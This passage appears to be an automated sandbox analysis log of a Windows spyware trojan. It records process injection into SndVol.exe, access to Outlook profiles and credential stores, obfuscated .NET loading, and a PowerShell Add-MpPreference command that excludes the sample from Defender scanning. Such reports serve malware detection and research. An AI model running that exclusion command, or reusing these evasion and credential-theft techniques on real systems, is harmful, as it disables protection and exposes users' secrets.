                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0519FF099_2_0519FF09
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050E1F929_2_050E1F92
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0519FFB19_2_0519FFB1
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050E9EB09_2_050E9EB0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050E99509_2_050E9950
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050FB9509_2_050FB950
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0514D8009_2_0514D800
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050E38E09_2_050E38E0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0519FB769_2_0519FB76
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050FFB809_2_050FFB80
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05155BF09_2_05155BF0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0511DBF99_2_0511DBF9
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0519FA499_2_0519FA49
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05197A469_2_05197A46
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05153A6C9_2_05153A6C
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05125AA09_2_05125AA0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0517DAAC9_2_0517DAAC
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05181AA39_2_05181AA3
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0518DAC69_2_0518DAC6
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_030A1F109_2_030A1F10
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0309CE399_2_0309CE39
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0309CE409_2_0309CE40
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0309B1909_2_0309B190
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0309B0409_2_0309B040
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0309D0609_2_0309D060
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_030A37C09_2_030A37C0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_030A55D09_2_030A55D0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_030BBC209_2_030BBC20
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_04F8E4739_2_04F8E473
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_04F8E3559_2_04F8E355
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_04F8D8D89_2_04F8D8D8
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_04F8E80F9_2_04F8E80F
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_04F8CB789_2_04F8CB78
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 05115130 appears 50 times
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 0515F290 appears 105 times
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 05127E54 appears 102 times
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 050CB970 appears 277 times
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 0514EA12 appears 86 times
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 0178EA12 appears 86 times
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 0170B970 appears 275 times
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 01755130 appears 58 times
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 0179F290 appears 105 times
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 01767E54 appears 101 times
                Source: file.exe, 00000000.00000002.1326280149.000000000129E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
                Source: file.exe, 00000000.00000002.1358933336.000000000A7A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs file.exe
                Source: file.exe, 00000000.00000000.1304212812.0000000000C72000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamefYaO.exeD vs file.exe
                Source: file.exe, 00000004.00000002.1669747825.000000000180D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs file.exe
                Source: file.exeBinary or memory string: OriginalFilenamefYaO.exeD vs file.exe
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.file.exe.4af1228.2.raw.unpack, Op9oSDQex61ZbKAB8f.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.file.exe.4af1228.2.raw.unpack, Op9oSDQex61ZbKAB8f.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.file.exe.4af1228.2.raw.unpack, rBxlgrxj8aX9QyCKGq.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.file.exe.4af1228.2.raw.unpack, rBxlgrxj8aX9QyCKGq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.file.exe.4af1228.2.raw.unpack, rBxlgrxj8aX9QyCKGq.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.file.exe.a7a0000.4.raw.unpack, rBxlgrxj8aX9QyCKGq.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.file.exe.a7a0000.4.raw.unpack, rBxlgrxj8aX9QyCKGq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.file.exe.a7a0000.4.raw.unpack, rBxlgrxj8aX9QyCKGq.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.file.exe.a7a0000.4.raw.unpack, Op9oSDQex61ZbKAB8f.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.file.exe.a7a0000.4.raw.unpack, Op9oSDQex61ZbKAB8f.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/7@15/12
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.logJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jslb2lgq.fqy.ps1Jump to behavior
                Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: SndVol.exe, 00000009.00000002.3761170910.0000000003367000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000009.00000003.1862516130.0000000003338000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000009.00000003.1862381746.0000000003317000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3761170910.0000000003338000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000009.00000003.1864462711.0000000003343000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: file.exeVirustotal: Detection: 30%
                Source: file.exeReversingLabs: Detection: 34%
                Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe"
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeProcess created: C:\Windows\SysWOW64\SndVol.exe "C:\Windows\SysWOW64\SndVol.exe"
                Source: C:\Windows\SysWOW64\SndVol.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe"Jump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"Jump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeProcess created: C:\Windows\SysWOW64\SndVol.exe "C:\Windows\SysWOW64\SndVol.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: SndVol.pdbGCTL source: CQcxGFiNQWzmXwbg1.exe, 00000008.00000002.3762337231.000000000075E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: file.exe, 00000004.00000002.1669747825.00000000016E0000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000009.00000003.1677267972.0000000004EEE000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000009.00000003.1669757476.0000000004D34000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3768722714.000000000523E000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3768722714.00000000050A0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: file.exe, file.exe, 00000004.00000002.1669747825.00000000016E0000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, SndVol.exe, 00000009.00000003.1677267972.0000000004EEE000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000009.00000003.1669757476.0000000004D34000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3768722714.000000000523E000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3768722714.00000000050A0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: SndVol.pdb source: CQcxGFiNQWzmXwbg1.exe, 00000008.00000002.3762337231.000000000075E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: CQcxGFiNQWzmXwbg1.exe, 00000008.00000000.1584029398.0000000000C0F000.00000002.00000001.01000000.0000000C.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000000.1745800573.0000000000C0F000.00000002.00000001.01000000.0000000C.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.file.exe.4079f58.0.raw.unpack, MainForm.cs.Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.file.exe.a7a0000.4.raw.unpack, rBxlgrxj8aX9QyCKGq.cs.Net Code: icPUP4GWYY System.Reflection.Assembly.Load(byte[])
                Source: 0.2.file.exe.4af1228.2.raw.unpack, rBxlgrxj8aX9QyCKGq.cs.Net Code: icPUP4GWYY System.Reflection.Assembly.Load(byte[])
                Source: 0.2.file.exe.4099f78.1.raw.unpack, MainForm.cs.Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0740AC98 push eax; iretd 0_2_0740AC99
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0740C0D0 push cs; ret 0_2_0740C0D1
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00414C8A push edi; retf 1685h4_2_00414C84
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004140F8 pushfd ; retf 4_2_00414115
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004088BC push 00000002h; iretd 4_2_004088D5
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00401959 push ds; ret 4_2_0040195A
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00414103 pushfd ; retf 4_2_00414115
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00402219 push cs; ret 4_2_00402225
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00404A35 push ss; iretd 4_2_00404A40
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00401345 pushad ; iretd 4_2_0040134A
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00414B0B pushad ; ret 4_2_00414B0E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0040DB16 push edi; retf 4_2_0040DB17
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00403640 push eax; ret 4_2_00403642
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00424653 push ecx; iretd 4_2_0042465C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0041867E push ecx; iretd 4_2_00418680
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004196F4 push ebp; iretd 4_2_00419715
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0041969C push esi; retf 4_2_0041969D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00401F76 push ebp; iretd 4_2_00401F7F
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017109AD push ecx; mov dword ptr [esp], ecx4_2_017109B6
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050D09AD push ecx; mov dword ptr [esp], ecx9_2_050D09B6
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_030A6059 push esi; retf 9_2_030A605A
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_030A60B1 push ebp; iretd 9_2_030A60D2
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_030B0676 pushfd ; ret 9_2_030B0699
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_030B0680 pushfd ; ret 9_2_030B0699
